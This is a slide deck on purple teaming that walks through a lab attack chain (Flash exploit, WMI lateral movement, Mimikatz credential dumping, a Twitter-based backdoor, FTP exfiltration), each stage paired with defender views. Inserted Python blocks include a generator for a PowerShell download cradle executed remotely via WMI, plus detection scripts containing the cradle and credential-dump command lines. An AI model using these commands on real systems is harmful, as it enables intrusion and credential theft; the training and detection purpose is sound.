 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 

Purple View

  • 1. Purple View
    The recent trend of using Attack and Defense together
    Not OUR idea - backed by many
    @raffertylaura | @haydnjohnson
  • 2. Quick who are we
    Haydn Johnson (@haydnjohnson) - OSCP, offensive/attack interest, enjoys presenting
    Laura (@raffertylaura) - MSc Computer Science (Security/Privacy), interested in both sides of security, loooooves presenting
  • 3. Contents
    1. Basic term definitions
    2. Introduction to Red, Blue and Purple
    3. Run through of an attack
       ○ Gaining Access
       ○ Lateral Movement
       ○ Domain Admin
       ○ Maintaining Access
       ○ Data Exfiltration
    4. For each attack:
       ○ Attacking view
       ○ Defender's view
       ○ Possible Purple Team exercises
  • 4. Definitions
    Exploit - the thing used to gain unauthorized access to a system
    Payload - what is done after access is gained (shell, command)
    Metasploit - an open source, modular exploit framework
    Meterpreter - an advanced, extensible payload that uses in-memory DLL injection
    Shell - gaining terminal/CMD access remotely
    https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
    http://www.metasploit.com/
  • 5. Red Team - Penetration | Offensive
    ● Scans
    ● Exploits
    ● Logic abuse
    ● Access to things they shouldn't
  • 6. Blue Team - Block, Prevent, Detect | Defensive
    ● Logs
    ● Emails
    ● Events
    ● Triggers
    ● Networking
    ● More logs
  • 7. Red Team - Goals
    ● Model recent threats and trends
    ● Longer term
    ● Highlight gaps in security controls, detection etc.
    ● Escape and evade for persistence
  • 8. Blue Team - Goals
    ● Detect attack
    ● Respond and recover
    ● Produce actionable intelligence
    ● Identify gaps and investment needs
  • 9. Purple Team - Offensive & Defensive
    Working together to achieve the ultimate goal of making the organization more secure
    ● Exposes blue team to different threats & attacker mindset
    ● Tests incident detection and response
    ● Allows red team to sharpen skills
    ● Policy and procedures tested
    ● Tuning of controls
  • 10. Purple Team - Offensive & Defensive
    Different types of Purple Teaming:
    ● Red Team sitting with the network defense team
    ● Adversary simulation
    ● Traffic generation
    ● cobaltstrike.com
    ● Wargaming
    Requires a total picture involving all areas of the organization
  • 11. Purple Team - The difference
    ● Using security posture and weaknesses to find what is most valuable
    ● Goal oriented
    ● Review the attack
    ● Test how teams use services and how they are managed
  • 12. Purple Team - The difference
    ● Time to Domain Admin
    ● Time to Data/Objective
    ● Time to Respond
    ● Time to Recover
    ● Identify where there needs to be more investment
    ● Measure impact
    Done right, the blue team should come out with better monitoring and response plans.
  • 13. Purple Team - The difference
    ● Set up a fake scenario - Assume Breach
    ● How will the attacker gain access?
    ● Why have they attacked, what do they want?
    ● How did they move through the network?
    ● If they exfiltrated data, how?
    Do not turn off servers or block IP addresses; make it realistic.
  • 14. Purple Team - Exercise
    “In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.” - Raphael Mudge
    http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/
  • 15. Purple Team - DEMO (step by step)
    Our exercise
  • 16. Purple Team - Demo Architecture
    Domain: corp.test.com
  • 17. Tools Used
    Red Team:
    ● Kali Linux
    ● Metasploit
    ● Meterpreter
    ● PowerSploit
    ● Twittor
    Blue Team:
    ● Wireshark
    ● Windows Event Logs
  • 18. Setting up Windows GP (Group Policy)
  • 19. Gaining Access
    Hacking Team Flash exploit
  • 20. Flash Exploits
    ● Flash plugins are vulnerable
      ○ You can embed JavaScript/binary within a Flash file
      ○ ActionScript to define events to redirect to a landing page
    ● Most exploit kit landing pages redirect to pages containing Flash exploits
      ○ Angler
      ○ Nuclear
      ○ Fiesta
    ● Installed by default in the browser
    ● New vulnerabilities are identified on almost a weekly basis
  • 21. Gaining Access
    Flash 18.0.0.194
  • 22. A: Flash Exploit from SecurityFocus
    Hacking Team Flash exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb
  • 23. A: Start Flash Exploit from Kali
  • 24. A: Start Flash Exploit from Kali
  • 25. A: Redirect Victim
    Client1 user navigates to a malicious site which redirects to the exploit
  • 26. A: Client1 is exploited
  • 27. A: A session is now established with Client1
    We can now run Meterpreter
  • 28. B: Wireshark: Landing Page and Redirect
  • 30. B: What can you take away
    Security Onion - implement it, it is free; it has Snort rules for Flash exploits (need to install)
    Confirm whether Flash is needed for business reasons
    Keep Flash updated
    2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules)
    2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules)
    https://www.security-database.com/detail.php?alert=CVE-2015-5119
    https://security-onion-solutions.github.io/security-onion/
  • 31. Purple Team - Exercise
    ● Blue team understands how attackers can gain initial access
    ● Flash exploits - an ongoing issue
    ● Helps the blue team to identify suspicious traffic and what is happening from the attacker's perspective
    ● Red team sees how its attacks are visible to the blue team and thinks of ways to be more stealthy
  • 33. Privilege Escalation
    ● We are skipping privilege escalation from Domain User to Local Admin
  • 35. A: PowerSploit
    Available on GitHub, open source: https://github.com/mattifestation/PowerSploit
  • 36. A: PowerSploit
    More than one script! PowerShell modules
  • 37. PowerView
    Part of the PowerShellEmpire PowerTools repository; very advanced
    https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
  • 38. A: Lateral Movement
    The same local Administrator account password on multiple computers, by Sean Metcalf
    https://adsecurity.org/?p=1684
  • 39. Same Passwords for All Local Admins
  • 41. A: Lateral Movement
    PowerSploit remote PowerShell using Invoke-Shellcode.ps1
  • 42. A: Base64 Encoding Payload
    Removes issues with whitespace
    The Hacker Playbook 1 (now 2): http://thehackerplaybook.com/dashboard/
  • 43. A: Hosting PowerSploit
    Invoke-Shellcode.ps1 - PowerSploit code hosted on the local Kali machine
  • 44. A: Invoke-WmiMethod
    Use PowerShell to connect remotely, create a new process and launch the IEX cradle.
    Calls Windows Management Instrumentation (WMI) methods. The Win32_Process WMI class allows creation of a process.
  • 45. A: Execute Remote Command
    Execute a command from Client1 to tell Client2 to download and execute the shellcode
  • 46. A: Client1 gives same password
    Same password across multiple clients
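Slides 42 to 45 as one worked example, added here and not part of the talk or of The Hacker Playbook: Python on the attacker's Kali box builds the IEX download cradle for the hosted Invoke-Shellcode.ps1, encodes it the way powershell.exe -EncodedCommand expects (UTF-16LE first, then Base64, which is why the blob carries no whitespace or quoting that could break across the WMI hop), and prints the Invoke-WmiMethod line run from Client1 to create the process on Client2. The decoder is the same transform reversed, which is what a defender applies to the command line in a process creation event. The URL 10.0.0.5, the -NoProfile/-WindowStyle Hidden switches and the host name Client2 are assumptions for a lab like the one in the slides, not values from the talk.

```python
import base64

# Assumed lab values (not from the slides): where Kali hosts the script and the target of the WMI call.
KALI_URL = "http://10.0.0.5/Invoke-Shellcode.ps1"
TARGET = "Client2"


def build_cradle(url):
    """PowerShell download cradle: fetch the script text over HTTP and IEX it in memory.

    Only the script body crosses the wire; nothing is written to disk on the target.
    """
    return f"IEX (New-Object Net.WebClient).DownloadString('{url}')"


def encode_command(script):
    """Encode a script for powershell.exe -EncodedCommand.

    PowerShell decodes the Base64 as UTF-16LE, not UTF-8. The Base64 alphabet has
    no spaces or quotes, so the blob survives being passed through WMI untouched.
    """
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob):
    """Reverse of encode_command; the transform a defender applies to a logged command line."""
    return base64.b64decode(blob).decode("utf-16-le")


def remote_command_line(blob):
    """What Win32_Process.Create will spawn on the target (the switches are an assumption)."""
    return f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {blob}"


def wmi_invocation(target, blob):
    """Invoke-WmiMethod line typed on Client1. With no -Credential it runs as the
    current logon, which is why a shared local Administrator password is enough."""
    return (f"Invoke-WmiMethod -ComputerName {target} -Class Win32_Process "
            f'-Name Create -ArgumentList "{remote_command_line(blob)}"')


def main():
    blob = encode_command(build_cradle(KALI_URL))
    print(wmi_invocation(TARGET, blob))
    print("decoded:", decode_command(blob))  # sanity check before running it


if __name__ == "__main__":
    main()
```

Encoding as UTF-8 instead of UTF-16LE is the classic mistake: the blob decodes to garbage and PowerShell reports a parse error, so the decoder doubles as a check that the payload was built correctly. The same decoder is what turns the Base64 in a captured process creation event back into the cradle with Kali's address in it.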
  • 48. B: Wireshark Traffic
    TCP handshake, bind requests
  • 49. B: Client1 requests a remote instance on Client2
  • 50. B: Client2 eventually asks where Kali is
  • 51. B: Client2 downloads Invoke-Shellcode.ps1
  • 52. B: Client1 logs into Client2
  • 53. B: PowerShell process created
  • 54. B: PowerShell connects to Kali
    Client2 reaches out to Kali on port 80
  • 55. B: What can you take away
    Event correlation - based on event ID, source and destination for remote connections
    Implement alerting based on security events taken together; a SIEM can/SHOULD do this
    Use LOG-MD - a really great logging tool, especially for PowerShell
    http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting-through-the-junk
    http://malwarearchaeology.squarespace.com/log-md/
  • 56. Purple Team - Benefits
    ● Identify ways to move around the network
    ● Identify and confirm defensive controls in place
    ● Identify what worked and what did not
    ● Implement changes
    ● Justification for resources
  • 57. Privilege Escalation
    Local Admin to Domain Admin
  • 58. A: Local Admin to Domain Admin
    ● Why escalate privileges from Local Admin to Domain Admin?
    ● Domain Admin - control over Active Directory!
    ● Access IT resources
    ● Create accounts
    ● Propagate malware
  • 59. A: Local Admin to Domain Admin
  • 60. A: Local Admin to Domain Admin
    From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll
  • 61. A: Local Admin to Domain Admin
    Use psexec to run mimikatz.exe on Client2
  • 62. A: Local Admin to Domain Admin
    Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2!
  • 64. B: Event Logs
    Client1 logs into Client2 as local admin
  • 65. B: Event Logs
    Client1 runs mimikatz on Client2
  • 66. B: Event Logs
    Sensitive privilege use from Client1 to Client2
  • 67. B: What can you take away
    ● Prevention:
      ○ Access control for the shared drive
      ○ Limit access to psexec and monitor its use
      ○ Active Directory best practices
    ● Detection:
      ○ IDS signatures
      ○ SIEM use case - event correlation between system logs and network proxy logs
      ○ For lateral movement: enable file level auditing
      ○ Canary accounts
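The correlation that the take-aways on slides 55 and 67 ask for (event ID plus source and destination for remote connections, system logs tied to network logs), as an added Python example that is not part of the talk: a small rule engine over constructed events modelled on the two chains seen in slides 48 to 54 and 60 to 66. Rule one ties a network (type 3) logon to a later powershell.exe process creation whose -EncodedCommand decodes to a download cradle, then confirms it against an outbound proxy/firewall record to the server named in the URL. Rule two ties ADMIN$ share access to a service install and a process whose command line carries a sekurlsa module. The event IDs are the standard Windows ones (4624 logon, 4688 process creation, 5140 share access, 7045 service install); 4688 only carries the command line when "Include command line in process creation events" is enabled through Group Policy (slide 18). The IP addresses, host names, five-minute window and field names are assumptions, and the event list is constructed, not real log data.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

WINDOW = timedelta(minutes=5)  # how far back a process creation looks for its logon / share access

# Constructed sample events, not real log data. The cradle is the one slides 43/44 describe.
T0 = datetime(2015, 11, 1, 10, 0)
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-Shellcode.ps1')"
BLOB = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

def ev(secs, host, eid, **fields):
    """One normalised event: a Windows event ID (int) or 'net' for a proxy/firewall record."""
    return {"ts": T0 + timedelta(seconds=secs), "host": host, "id": eid, **fields}

SAMPLE_EVENTS = [
    # benign: an interactive logon and a normal process on another client
    ev(1, "Client3", 4624, logon_type=2, user="alice", src="-"),
    ev(2, "Client3", 4688, process=r"C:\Windows\System32\notepad.exe", cmdline="notepad.exe"),
    # chain 1 (slides 48-54): network logon from Client1, then PowerShell with an encoded cradle
    ev(5, "Client2", 4624, logon_type=3, user="Administrator", src="10.0.0.11"),
    ev(7, "Client2", 4688, process=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       cmdline="powershell.exe -NoProfile -EncodedCommand " + BLOB),
    ev(8, "Client2", "net", src="10.0.0.12", dst="10.0.0.5", dport=80),
    # chain 2 (slides 60-66): ADMIN$ mapped from Client1, PSEXESVC installed, mimikatz run under it
    ev(720, "Client2", 5140, share=r"\\*\ADMIN$", src="10.0.0.11", user="Administrator"),
    ev(723, "Client2", 7045, service="PSEXESVC"),
    ev(725, "Client2", 4688, process=r"C:\Windows\mimikatz.exe", parent=r"C:\Windows\PSEXESVC.exe",
       cmdline='mimikatz.exe "sekurlsa::logonpasswords" exit'),
]

def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand / -enc / -e argument (Base64 of UTF-16LE); None if absent or invalid."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def within(evs, eid, before, **match):
    """Events with this ID inside WINDOW before `before` whose fields equal `match`."""
    return [e for e in evs if e["id"] == eid and before - WINDOW <= e["ts"] <= before
            and all(e.get(k) == v for k, v in match.items())]

def remote_powershell_cradle(host, evs):
    """Type-3 logon, then powershell.exe whose encoded command downloads a script,
    confirmed by an outbound connection to the server named in that URL."""
    alerts = []
    for e in evs:
        if e["id"] != 4688 or "powershell" not in e.get("process", "").lower():
            continue
        script = decode_encoded_command(e.get("cmdline", ""))
        if not script or "downloadstring" not in script.lower():
            continue
        logons = within(evs, 4624, e["ts"], logon_type=3)
        if not logons:
            continue
        m = re.search(r"https?://[^\s'\")]+", script)
        url = m.group(0) if m else None
        server = urlparse(url).hostname if url else None
        net = [n for n in evs if n["id"] == "net" and n.get("dst") == server
               and e["ts"] <= n["ts"] <= e["ts"] + WINDOW]
        alerts.append({"rule": "remote_powershell_cradle", "host": host, "source": logons[-1]["src"],
                       "url": url, "confirmed_by_network": bool(net)})
    return alerts

def psexec_credential_dump(host, evs):
    """ADMIN$ share access (5140), a service install (7045), then a process naming a sekurlsa module."""
    alerts = []
    for e in evs:
        if e["id"] != 4688 or "sekurlsa" not in e.get("cmdline", "").lower():
            continue
        shares = [s for s in within(evs, 5140, e["ts"]) if "ADMIN$" in s.get("share", "").upper()]
        services = within(evs, 7045, e["ts"])
        if shares and services:
            alerts.append({"rule": "psexec_credential_dump", "host": host, "source": shares[-1]["src"],
                           "service": services[-1]["service"], "process": e["process"]})
    return alerts

def correlate(events):
    """Group by host, sort by time, run every rule; returns a list of alert dicts."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda x: x["ts"]):
        by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        alerts += remote_powershell_cradle(host, evs) + psexec_credential_dump(host, evs)
    return alerts

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The two benign Client3 events produce nothing, the Client2 events produce one alert per chain, and each alert names the source address of the logon or share access so the analyst has both ends of the remote connection, which is the point of slide 55. A canary account from slide 67 drops into the same engine as a one-line rule on 4624/4625 for that user name.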
  • 68. Purple Team - Benefits
    ● Blue team observes vulnerabilities/threats which may not have been considered
      ○ Learns how an attacker could escalate privileges from local admin to domain admin
    ● Red team observes the footprint left behind by this attack and possibly how to minimize it
      ○ Can identify potential weaknesses in blue team monitoring/response processes
      ○ Provide more thorough recommendations
  • 70. A: Twittor
    ● Easy to install
    ● Easy to use
    ● Easy to add shellcode
    https://github.com/PaulSec/twittor
  • 71. A: Twittor - insides
    Simple subprocess execution; stored as a base64 encoded message
  • 72. A: PyInstaller
    On GitHub; turns a Python file into an EXE
    https://github.com/pyinstaller/pyinstaller
  • 73. A: PyInstaller
    Python file becomes an executable
  • 74. Twittor: Backdoor Using Twitter
  • 75. A: Twittor
    Python file used as the C2 server
    Python file used as the backdoor EXE (PyInstaller)
  • 76. A: Twittor - Retrieving command
    Send command to execute; retrieve command
  • 77. B: Twittor - Network Traffic
    Reaching out to the API - normal user traffic??
  • 78. B: Twittor - Client system
    Backdoor as a Python executable compiled with the --noconsole flag to hide output
  • 79. B: Traffic from Client
    Reaches out to Twitter; src and destination are internal IPs, sends to the API
  • 80. B: What can you take away
    Check if there are any remote connections after hours - is it against policy?
    Again, correlate logs with known C2 addresses
    See if AV picks it up
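A detection pass for the Twittor traffic in slides 77 to 80, as an added Python example that is not part of the talk or of Twittor: it reads a constructed proxy log (pipe separated: timestamp, client, destination host, user agent, path) and reports, per client/destination pair, the signals the slides point at: a destination already on a known C2 list, a non-browser user agent talking to the Twitter API, near-constant intervals between requests (a beacon), and requests outside business hours. The log lines, the API path, the 07:00 to 19:00 policy window, the thresholds and the user agent strings are assumptions; a proxy only sees the user agent and path if it terminates TLS, otherwise only the host and timing signals apply.

```python
import statistics
from collections import defaultdict
from datetime import datetime, time

# Policy knobs: assumptions for a lab, tune to your own environment.
BUSINESS_HOURS = (time(7, 0), time(19, 0))
MIN_REQUESTS = 6        # samples needed before periodicity is judged
MAX_JITTER = 0.2        # stdev/mean of the gaps between requests; below this looks like a beacon
BROWSER_MARKERS = ("mozilla/", "applewebkit", "chrome/", "safari/")
KNOWN_C2 = {"c2.example.net"}   # constructed; in practice fed from threat intel

# Constructed proxy log (not real traffic): timestamp|client|host|user agent|path
LOG_LINES = [
    # a Twittor-style client polling the API about once a minute at 01:00 with a library user agent
    f"2015-11-01T01:{s // 60:02d}:{s % 60:02d}|10.0.0.12|api.twitter.com|python-requests/2.7.0|/1.1/direct_messages.json"
    for s in (0, 61, 119, 181, 240, 299, 361, 420)
] + [
    # a person reading Twitter in a browser during the day
    "2015-11-01T09:12:04|10.0.0.20|twitter.com|Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36|/home",
    "2015-11-01T09:15:30|10.0.0.20|twitter.com|Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36|/notifications",
    "2015-11-01T11:40:00|10.0.0.20|twitter.com|Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36|/home",
    # a single hit on a host the threat-intel list already names
    "2015-11-01T10:00:00|10.0.0.31|c2.example.net|Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36|/gate.php",
]


def parse(line):
    ts, client, host, ua, path = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "client": client, "host": host, "ua": ua, "path": path}


def is_browser(ua):
    return any(marker in ua.lower() for marker in BROWSER_MARKERS)


def after_hours(ts):
    start, end = BUSINESS_HOURS
    return not (start <= ts.time() < end)


def beacon_score(timestamps):
    """(mean gap in seconds, jitter) for a series of requests, or None with too few samples."""
    if len(timestamps) < MIN_REQUESTS:
        return None
    ordered = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
    mean = statistics.mean(gaps)
    if mean <= 0:
        return None
    return mean, statistics.pstdev(gaps) / mean


def analyse(lines):
    """Group requests per (client, destination) and collect the reasons each pair looks like C2."""
    pairs = defaultdict(list)
    for rec in map(parse, lines):
        pairs[(rec["client"], rec["host"])].append(rec)
    findings = []
    for (client, host), recs in pairs.items():
        reasons = []
        if host in KNOWN_C2:
            reasons.append("known C2 host")
        if any(not is_browser(r["ua"]) for r in recs):
            reasons.append("non-browser user agent")
        score = beacon_score([r["ts"] for r in recs])
        if score and score[1] <= MAX_JITTER:
            reasons.append(f"periodic: every {score[0]:.0f}s, jitter {score[1]:.2f}")
        late = sum(after_hours(r["ts"]) for r in recs)
        if late:
            reasons.append(f"{late} requests outside business hours")
        if reasons:
            findings.append({"client": client, "host": host, "requests": len(recs), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyse(LOG_LINES):
        print(finding)
```

The browsing client produces no finding at all, the polling client collects three independent reasons, and the threat-intel hit collects one; the number of reasons per pair is a usable triage order. The timing signal is the one that survives when the API is reached over TLS and the proxy sees nothing but the host name, which is why it is worth keeping even where the user agent is unavailable.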
  • 81. Purple Team - Benefits
    Test if a C2 can reach out to Twitter. Social media may be blocked via the browser, but some sites can still be accessed via the API etc.
    If it is not blocked, why not? Can your blue team help to stop this and others?
  • 82. Data Exfiltration
    Clear text FTP
  • 83. A: Data Exfiltration Through Clear Text FTP
  • 84. A: FTP Extraction
    Finding data to extract
  • 85. A: Finding data
    Important data identified
  • 88. B: Meterpreter connection
    DLL injection; lots of chatter
  • 89. B: FTP connection
    Clear text
  • 91. B: What can you take away?
    Disable FTP - there should not really be a business need for it
    If there is a business need, whitelist those IP addresses | create a group of users specifically for FTP
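The clear text FTP session of slides 89 and 91, as an added Python example that is not part of the talk: a parser for the FTP control channel as a sniffer on the segment would see it, which recovers the USER/PASS pair, works out the data-channel endpoint from PORT and the 227 PASV reply (the last two numbers are the port, p1*256 + p2) and pairs each STOR/RETR with it, then applies the slide 91 policy (allowed server list, dedicated FTP user group). The transcript, the server address 10.0.0.5, the allow list and the FTP group are constructed assumptions.

```python
import re

# Policy from slide 91, as assumptions for a lab: approved FTP servers and the dedicated FTP user group.
ALLOWED_SERVERS = {"10.0.0.40"}
FTP_GROUP = {"svc_ftp"}

# Constructed FTP control-channel transcript as a sniffer on the segment sees it ("C:" client, "S:" server).
CAPTURE = """\
S: 220 (vsFTPd 3.0.2)
C: USER anonymous
S: 331 Please specify the password.
C: PASS hunter2
S: 230 Login successful.
C: TYPE I
S: 200 Switching to Binary mode.
C: PASV
S: 227 Entering Passive Mode (10,0,0,5,195,149).
C: STOR Q3-customer-export.xlsx
S: 150 Ok to send data.
S: 226 Transfer complete.
C: PORT 10,0,0,12,4,1
S: 200 PORT command successful. Consider using PASV.
C: STOR payroll.csv
S: 150 Ok to send data.
S: 226 Transfer complete.
C: PASV
S: 227 Entering Passive Mode (10,0,0,5,196,10).
C: RETR readme.txt
S: 150 Opening BINARY mode data connection for readme.txt (12 bytes).
S: 226 Transfer complete.
C: QUIT
S: 221 Goodbye.
"""

HOSTPORT = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def hostport(text):
    """Decode the h1,h2,h3,h4,p1,p2 form used by PORT and the 227 reply: port = p1*256 + p2."""
    m = HOSTPORT.search(text)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = m.groups()
    return f"{h1}.{h2}.{h3}.{h4}", int(p1) * 256 + int(p2)


def parse_session(capture, server_ip):
    """Walk the control channel and recover credentials, data-channel endpoints and transfers."""
    s = {"server": server_ip, "user": None, "password": None, "uploads": [], "downloads": []}
    pending = None  # data channel announced by the last PORT / 227, consumed by the next transfer
    for line in capture.splitlines():
        side, _, msg = line.partition(": ")
        if side == "C":
            verb, _, arg = msg.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                s["user"] = arg
            elif verb == "PASS":
                s["password"] = arg
            elif verb == "PORT" and hostport(arg):
                pending = ("active",) + hostport(arg)      # server connects back to the client
            elif verb in ("STOR", "RETR"):
                s["uploads" if verb == "STOR" else "downloads"].append((arg, pending))
                pending = None
        elif side == "S" and msg.startswith("227") and hostport(msg):
            pending = ("passive",) + hostport(msg)         # client connects to the server
    return s


def assess(session):
    """Apply the slide 91 policy and list what an analyst would want to see in an alert."""
    findings = []
    if session["password"] is not None:
        findings.append(f"clear-text credentials on the wire: {session['user']} / {session['password']}")
    if session["server"] not in ALLOWED_SERVERS:
        findings.append(f"FTP to non-whitelisted server {session['server']}")
    if session["user"] is not None and session["user"] not in FTP_GROUP:
        findings.append(f"user {session['user']} is not in the FTP group")
    for name, chan in session["uploads"]:
        via = f"{chan[0]} data channel {chan[1]}:{chan[2]}" if chan else "unknown data channel"
        findings.append(f"upload of {name} over {via}")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_session(CAPTURE, "10.0.0.5")):
        print(finding)
```

The control channel alone answers the slide 92 question of whether anything should have fired: the password, the destination, the account and the two uploaded file names are all visible before a single byte of the data channel is looked at, and the decoded PORT/PASV endpoints are what a sensor needs in order to pull the corresponding data connection out of the capture.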
  • 92. Purple Team - Exercise
    Clear text - will any alarms trigger?
    Understand potential holes in alerting
    Measure time to detect and respond
  • 93. Conclusion
    Purple Teaming is Good
  • 94. Purple Team - Reiteration
    Provides more value than a penetration test
    Should be implemented on a regular schedule
    Helps train security personnel
    Helps make sure your boxes are tuned
  • 95. Limitations and Future Work
    ● So far we have limited detection tools to Windows Server event logs and Wireshark (and a bit of Snort)
    ● Could be extended to enterprise security tools such as SIEM/IDS
    ● PowerShell/WMI for the blue team
    ● More advanced attacks, persistence using PowerShell Empire
  • 97. References are in the following slides
  • 98. Microsoft - 8 minute video
    https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/
  • 99. Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
    http://www.slideshare.net/beltface/hybrid-talk
  • 100. A: Downloads PowerShell file
    Client2 reaches out to the Kali machine